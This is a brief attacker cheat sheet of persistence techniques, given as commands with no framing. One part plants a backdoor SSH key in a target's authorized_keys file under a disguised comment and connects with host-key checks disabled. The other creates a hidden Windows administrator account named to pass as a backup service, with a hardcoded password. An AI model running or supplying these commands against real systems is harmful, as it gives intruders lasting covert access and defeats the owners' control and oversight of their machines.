Persistence
via SSH
# ATTACKER
ssh-keygen -f ./target_backdoor_key -N "" -C "service@localhost" && echo "\n\necho '$(cat ./target_backdoor_key.pub)' >> ~/.ssh/authorized_keys\n\n"
# TARGET: !!! RUN COMMAND OUTPUT ABOVE !!!
# ATTACKER
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i ./target_backdoor_key <USER>@<TARGET>via Windows local user (SYSTEM)
# Create local user and add to local Administrators group
net user svc_backup P@ssw0rd123! /add
net localgroup Administrators svc_backup /add
net user svc_backup